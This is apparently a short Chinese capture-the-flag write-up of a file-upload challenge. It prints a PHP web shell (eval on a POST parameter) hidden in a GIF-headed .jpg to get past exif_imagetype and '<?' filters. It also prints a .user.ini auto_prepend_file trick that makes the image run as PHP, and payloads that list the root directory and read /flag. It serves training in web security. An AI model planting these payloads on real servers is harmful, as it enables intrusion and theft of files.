题目要点
- .user.ini文件
题目内容
解题
打开页面,一看就是文件上传相关漏洞
先随便上传一个txt文本文件,返回 exif_imagetype:not image!
这里我们可以得到信息:1.上传image。2.使用了 exif_imagetype 判断上传类型。
接着我们上传木马,同时添加文件头 GIF89a ,修改后缀为jpg
提示 <? in contents!
再改,最终结果
a.jpg源码
GIF89a
<script language='php'>eval($_POST['pass']);</script>
上传成功后还要解析为php才能使用。
这里使用 .user.ini 参考文章1 ,参考文章2
上传.user.ini
.user.ini源码
GIF89a
auto_prepend_file=a.jpg
最后菜刀连一下,找到flag。
方法二
上传图片马后
扫描根目录:a=var_dump(scandir("/"));,我们可以可以看见一个叫flag的文件
打印:a=var_dump(file_get_contents("/flag"));